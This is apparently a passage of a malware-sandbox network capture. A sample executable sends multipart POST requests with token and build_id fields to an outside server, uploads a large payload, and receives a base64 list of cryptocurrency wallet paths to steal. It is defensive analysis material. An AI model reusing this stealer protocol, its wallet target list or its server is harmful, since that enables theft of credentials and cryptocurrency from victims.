AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:44 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:44 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:44 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:44 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:44 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:45 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49772	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:46 UTC	183	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----37ycjmycbsr1nyu3wlxl Host: 95.217.30.53 Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 33 37 79 63 6a 6d 79 63 62 73 72 31 6e 79 75 33 77 6c 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 33 37 79 63 6a 6d 79 63 62 73 72 31 6e 79 75 33 77 6c 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 33 37 79 63 6a 6d 79 63 62 73 72 31 6e 79 75 33 77 6c 78 6c 0d 0a 43 6f 6e 74 Data Ascii: ------37ycjmycbsr1nyu3wlxlContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------37ycjmycbsr1nyu3wlxlContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------37ycjmycbsr1nyu3wlxlCont
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:46 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49773	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:47 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----7q16x4790zmgv3wbimoz Host: 95.217.30.53 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:47 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 71 31 36 78 34 37 39 30 7a 6d 67 76 33 77 62 69 6d 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 37 71 31 36 78 34 37 39 30 7a 6d 67 76 33 77 62 69 6d 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 37 71 31 36 78 34 37 39 30 7a 6d 67 76 33 77 62 69 6d 6f 7a 0d 0a 43 6f 6e 74 Data Ascii: ------7q16x4790zmgv3wbimozContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------7q16x4790zmgv3wbimozContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------7q16x4790zmgv3wbimozCont
2025-03-15 07:29:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:48 UTC	2316	IN	Data Raw: 39 30 30 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 900Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49774	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:48 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2vs26f3eua1v3790hvas Host: 95.217.30.53 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
